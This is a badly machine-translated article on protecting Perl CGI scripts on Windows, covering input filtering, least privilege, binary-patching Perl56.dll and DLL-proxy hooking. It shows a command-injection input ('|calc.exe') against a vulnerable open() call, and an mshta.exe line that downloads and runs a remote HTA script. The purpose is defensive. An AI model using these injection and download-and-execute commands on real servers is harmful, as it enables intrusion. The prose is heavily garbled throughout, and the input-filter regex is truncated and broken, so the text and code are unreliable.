We protect Perl
Vulnerable CGI-scripts - a remarkable opening in computer systems. Whether we can "block" her from 100 % reliability, once and for all? In clause{article} merits and demerits of existing approaches to protection Perl are analysed and the method of protection based on "hacker's" is offered (I fight fire with fire!) substitution of system functions of process.
If you program (or are going to to program) Internet-applications in language Perl for certain collided{faced} with the information, describing vulnerability of this language for hacker's attacks. The elementary script resulted in any tutorial on language Perl, in actual fact appears " widely open gate " for hackers, both highly experienced, and beginning{starting}. For example, a fragment of a code which simply deduces contents of the specified file
open (f, $filename);
while (<f>)
{
print;
}
Actually can carry out and other actions. Submit on his input{entrance} a line "|calc.exe", and you start the standard calculator on performance. In start on the removed server of standard programs (such as calc.exe or notepad.exe) there is not enough sense if not to know about an ideal master key of a hacker - the utility mshta.exe. She enters into standard delivery Windows and allows easily and easy zakachivat` in attacked system and to carry out in her an any code.
For example, performance in system of the command:
mshta.exe http://www.malware.com/foobar.hta
Will lead to to uploading on a computer of a file foobar.hta and to his execution{performance} as script VBS. This example creates and starts harmless (on assurances of organizers of a site malware.com) the application for MS-DOS, showing standard algorithm of generation of a flame. Naturally, the same way it is possible to begin to rock and execute an any executed file even if it there still no in system.
For whom is it necessary?
I would like to dispel a bias of some system administrators, that breaking of their server is necessary for nobody. Iron argument - the link on Imperceptible Dzho (" not such we the important bird that us to break "). Actually, breaking of any (any) server can be of use to a hacker as opens to him new remarkable opportunities:
? To dispatch from the vulnerable server the pair - three of gigabytes of a post spam.
? To arrange on vulnerable "varezjatnik server for not license software, music and video.
? To execute complex and interesting mathematical calculation (usually count cryptography to pick up someone's key, involving in this process - that business went faster - set of the cracked machines).
? "To crack or "muffle" garbage searches (attack " refusal in service ") more important server (for example, the server of any bank or official body).
Thus, vulnerable servers, irrespective of their importance, those people which are able to use these servers on their direct purpose represent danger not smaller, than.:-)
Why Perl it is vulnerable?
The rational explanation, what for function open in Perl fulfils a symbol of the conveyor | as the command to start the program on performance, to give difficultly: Perl in general rather irrational (but floppy and compact) language.:-) the Author of language Perl Larri Uoll for fun deciphers his name as Patalogically Eclectic Rubbish Lister (Patalogicheski Eclectic Garbage Lister) - we can wish only that his following versions developed in a direction of the greater safety, unambiguity and a faultlessness of a code - so necessary qualities for shared Internet-applications. Certainly, "patologichnost`", "ehklektichnost`" i "musornost`" are negative features with which Larri Uoll should struggle.:-)
Kill of the user input
In clauses{articles} about safe programming in language Perl it is possible to meet recommendations to filter the user input: in particular, to delete from the lines received from the outside symbols | and other signs having in Perl special value. For example, the following kill of input "will disinfect" the name of a file received from the outside from special and dangerous symbols.
if ($filename = ~ / [<> | - and.\/
Estimate, what abundance of special badges - "krokozjablikov" should be filtered for simple function of opening of a file. It is obvious, that is necessary to be the deep expert on language Perl and very close{attentive} person correctly to place all filters. As from the person, as against scrap iron, it is difficult to demand the absolute{hundred-percent} reliability, the programs placed in different places " on krokozjablikov " in practice can not work a trap.
Restriction of the rights of the Web-server
The Internet-server and all applications started by him , anyhow, contacting with all external world, should not have the right of the manager or the exclusive user. To appoint to service of the Web-server the limited rights - very reliable (and, probably, it is unique correct) a way to protect the server from attacks from the outside.
At designing a Internet-site it is necessary to break his information contents into separate folders where are from the very beginning:
? a) carried out scripts and programs
? b) the data intended only for reading (HTML-page)
? v) the data intended for change by visitors.
The user under which name the Internet-server will be started, should have access only to these folders, and, on scripts and the data it is necessary to place a ban recordings (differently the hacker can change slightly appearance and functioning of your site), and on the data intended for change by external users - an interdiction of performance (differently he can create and there and then execute in this folder anything you like). This variant of protection theoretically "nevskryvaem" - but in practice at the beginning{starting} manager will arise a number{line} of complexities.
So, in system Windows the web-server will not be started if not to open to him on access system dll in a folder c:winntsystem32. And if them to open, to all world there are accessible remarkable programs like regedt32.exe, mshta.exe, etc. It is possible to copy, certainly, on a leaflet the list necessary for the program system dll and to open on access to the Internet-server only them. Whether but many managers do{make} it (and whether it is necessary to them?).
In Unix-like systems there are difficulties (one of possible{probable} problems - the closed 80 port for the processes which are not having administrative privileges in system).
In any case, this method of protection demands good preparation and high motivation of the manager of system that specifies fundamental lack of such protection: she cannot be established compulsorily, together with installation of the protected program, and reliability of computer system completely depends on reliability of its{her} weakest link - a human brain.
"Lobotomija" Perl
Lobotomija is an operation on change of the person by damage of frontal shares of the brain responsible for aggression. One time this operation applied in relation to criminals to reduce their danger to a society. The surgeon by means of the special tool through eye-sockets reached{achieved} this area of a brain and easy postukivaniem wooden molotochkom on the handle of the tool rendered necessary damages (superfluous blood and cellular weight left with the help of a floppy probe).
We shall apply similar operation not to hackers (in due time her have recognized brutal and antihumane), and to binary distribution kit Perl "to chop off" at him "aggressive" reaction to a symbol | ("conveyor").
For this purpose we shall find in binary distribution kit Perl podstroku "cmd.exe" (a call of standard Windows NT/2000/XP shell). (For Windows 9x a name of the standard shell - "command.com"). Us files with expansion dll where this line is found interest. If we cause Perl start perl.exe, necessary to us of a component - Perl56.dll (the name can differ depending on the version of the distribution kit). We shall replace with any editor (I use built - in editor Far) podstroku cmd.exe with something another of the same length, for example, sex.exe. Thus, the symbol of "conveyor" appears non-working, however, we can start still applications function system ("ImjaProgrammy"). So, you see, though and it is less compact, but it is much more safe and less aggressive.:-)
The program sex.exe should deduce{remove} on a standard conclusion (stdout) any kind and touching greeting for a hacker. I hope, that with its{her} creation you will easily consult independently.:-).
Interception of system calls
We have warned not all dangers trapping the Perl-programmer.
Let's assume, that we want to forbid to interpreter Perl:
? Start of any external programs (the wise decision; the same sending of mail certainly is better for carrying out standard functions Perl - differently "lobotomiju", to some extent, it should to carry out to all programs which we start)
? Reading files, if expansion not ".html"
? Recording files, if expansion not ".user".
Having received such distribution kit Perl, even... We shall say so, not absolutely competent Web-programmer (to demand other from alive people we not only have no right, but also be not capable) will feel comfortably and, the most important, chilly.
The role of " a protective lining " in this case will execute special dll which will intercept the system calls specified by us and, if necessary, them will block.
In case Perl it is necessary for us to intercept system function CreateProcessA (start of the application) from library KERNEL32.dll, and also function fopen (opening of a file on reading or on recording) from library MSVCRT.dll.
We shall use system functions Windows GetProcAddress and GetModuleHandle to receive addresses of functions for interception, ImageDirectoryEntryToData - to receive the address of the beginning of the table of import, and function VirtualProtect and WriteProcessMemory to make changes to this table.
Leaning{Basing} on these keywords, you can find in Internet the ready decision, or write the application "interceptor" independently.
Introduction protective DLL
The technology dynamically komponuemykh libraries (DLL) essentially facilitates updating Windows-applications (the closed initial code is compensated to those, that all names of functions and points of their input{entrance} not only are well visible, but also are accessible to change). That "pristykovat`" dll in address space of process, I use a method of substitution DLL (there are also other methods, this in this case, perhaps, the most simple). For this purpose I come... Correctly, the text editor in an executed file Perl.exe also I correct podstroku Perl56.dll on romix1.dll (so we shall name our protective to a component).
I try to start Perl.exe. Certainly, Perl writes, that the necessary library romix1.dll is not found. Well, we shall create her . For this purpose we shall compile the program from three lines on Delphi, having named her romix1.dpr:
library romix1;
begin
end.
It is not enough of it: now Perl at start gives out a mistake:
Perl.exe it is connected to absent component Romix1.dll:RunPerl
Perl imports unique function RunPerl from this library, and we now shall create her (our "fake" it will be simple to pass management to "original"):
library romix1;
procedure RunPerlOrig; external ' Perl56.dll 'name' RunPerl ';
// It is original function RunPerl from library Perl56.dll.
procedure RunPerl; export; stdcall;
// An interceptor of function RunPerl
begin
asm
jmp RunPerlOrig; // we Do{Make} transition (jump)
end;
end;
exports RunPerl;
begin
end.
Assemblernaja the insert does{makes} transition where it is necessary. Now abusive messages have stopped, and changes in job Perl it is not visible. But we have reached{achieved} the important result: we dll became the full member (if not a brain) executed process Perl.exe. The further becomes business of technics{technical equipment} (more precisely, system calls Windows API and several "dot" replacements in the table of import Perl56.dll).
You can ask: how I have learned{have found out}, what DLL and functions are imported with the program? The answer is simple: dumpbin.exe from studio of development Microsoft.
Example of a call of this utility from the command line:
dumpbin.exe/imports perl.exe
" For the staff " there were such special questions, as a format of the table of import of the Windows-program. Partly this information can be received in comments of an initial code, and partly - from the literature. By the way, (for example, books Krisa Kasperski, Dzheffri Richter and Mehtta Pitreka) it is possible to find sources useful to beginning{starting} hackers more likely in network Internet, than in bookshops where them for some reason very quickly buy up.:-)
The conclusion
We have tried to protect Perl - one of the most popular (though and a little eclectic):-) languages for job with CGI - from attacks from Internet. We did{made} it at different levels:
? Kill of the user input
? Restriction of access rights
? Replacement podstrok in a body of the program
? Interception of system calls
Two more levels of protection are possible{probable}:
? Recompilation Perl
? Recompilation of a nucleus of operational system.
Efficiency of protection in all considered cases goes " on increasing ".
Certainly, to us recompilation, and recompilation with introduction of protective checks is important not simply. Our purpose - to introduce these checks by that or a different way, let even antihumane and "hacker's". By means of wooden molotochka.
